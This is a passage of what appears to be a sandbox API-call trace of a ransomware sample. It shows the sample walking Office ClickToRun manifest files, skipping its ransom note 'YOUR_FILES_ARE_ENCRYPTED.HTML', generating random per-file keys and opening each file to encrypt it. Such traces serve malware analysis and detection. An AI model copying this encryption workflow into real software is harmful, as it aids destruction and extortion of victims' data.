param_1=0x4ebda3a, param_2="%02X" | out: param_1="E4") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="DE") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6D") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="48") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="30") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="1C") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="22") returned 2 [0155.956] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="65") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4D") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="B6") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="93") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="07") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="49") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="03") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A0") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="98") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B5") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CB") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="1B") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="AC") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F3") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DB") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="23") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8C") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7E") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BE") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F1") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="04") returned 2 [0155.957] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="30") returned 2 [0155.958] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml" [0155.958] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.958] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0155.958] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c04a10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml", cAlternateFileName="C2FB2E~1.XML")) returned 1 [0155.958] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned 120 [0155.958] lstrcmpW (lpString1="C2RManifest.accessmuiset.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.958] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0155.960] lstrlenW (lpString=".xml") returned 4 [0155.960] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml") returned=".xml" [0155.960] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.960] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.accessmuiset.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.968] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0155.970] GetProcessHeap () returned 0x270000 [0155.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.972] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="14") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="39") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1C") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="49") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="74") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="80") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="62") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="AB") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="06") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6A") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="28") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AB") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="22") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="BC") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="07") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="84") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="8E") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DF") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="5D") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1D") returned 2 [0155.972] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="98") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DA") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="5F") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E3") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C5") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EA") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="88") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0155.973] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="58") returned 2 [0155.974] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml" [0155.974] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.974] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.975] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92ebbbd0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92ebbbd0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x773d5e70, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x410e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", cAlternateFileName="C210C4~1.XML")) returned 1 [0155.976] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned 123 [0155.976] lstrcmpW (lpString1="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.976] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0155.976] lstrlenW (lpString=".xml") returned 4 [0155.976] PathFindExtensionW (pszPath="C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned=".xml" [0155.991] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0155.991] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcf.dcf.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0155.993] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=16654) returned 1 [0155.993] GetProcessHeap () returned 0x270000 [0155.993] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0155.994] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="54") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="10") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2A") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="65") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A1") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="DC") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="10") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AF") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="40") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="03") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="0B") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8F") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="05") returned 2 [0155.994] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="43") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C6") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="74") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E9") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="66") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="BC") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="29") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="61") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A5") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="6E") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="C2") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="05") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="05") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="BD") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C6") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E7") returned 2 [0155.995] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="34") returned 2 [0155.996] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" [0155.996] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.996] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.997] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f246f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml", cAlternateFileName="C206B0~1.XML")) returned 1 [0155.997] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned 114 [0155.997] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.000] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0156.000] lstrlenW (lpString=".xml") returned 4 [0156.000] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0156.007] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.007] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0156.008] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9814) returned 1 [0156.008] GetProcessHeap () returned 0x270000 [0156.008] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.009] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="5B") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C0") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CF") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="90") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="B5") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="E1") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6E") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FB") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="73") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1B") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F4") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3D") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="83") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B5") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F9") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="81") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4F") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="89") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1E") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="89") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9C") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E0") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B3") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F5") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="53") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AB") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="84") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AC") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="8F") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B9") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="46") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="77") returned 2 [0156.011] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" [0156.011] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.011] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.011] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77363a50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cAlternateFileName="C21578~1.XML")) returned 1 [0156.011] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned 127 [0156.011] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.011] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0156.011] lstrlenW (lpString=".xml") returned 4 [0156.011] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0156.011] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.012] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=237874) returned 1 [0156.012] GetProcessHeap () returned 0x270000 [0156.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.016] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="24") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E7") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6C") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="89") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="2B") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="EE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3B") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="24") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5E") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AB") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="13") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="43") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FA") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="89") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A7") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E3") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F2") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="47") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="99") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="9F") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F6") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A9") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E9") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CA") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C2") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="04") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="89") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0156.017] lstrcpyW (in: lpString1=0x74823cc, 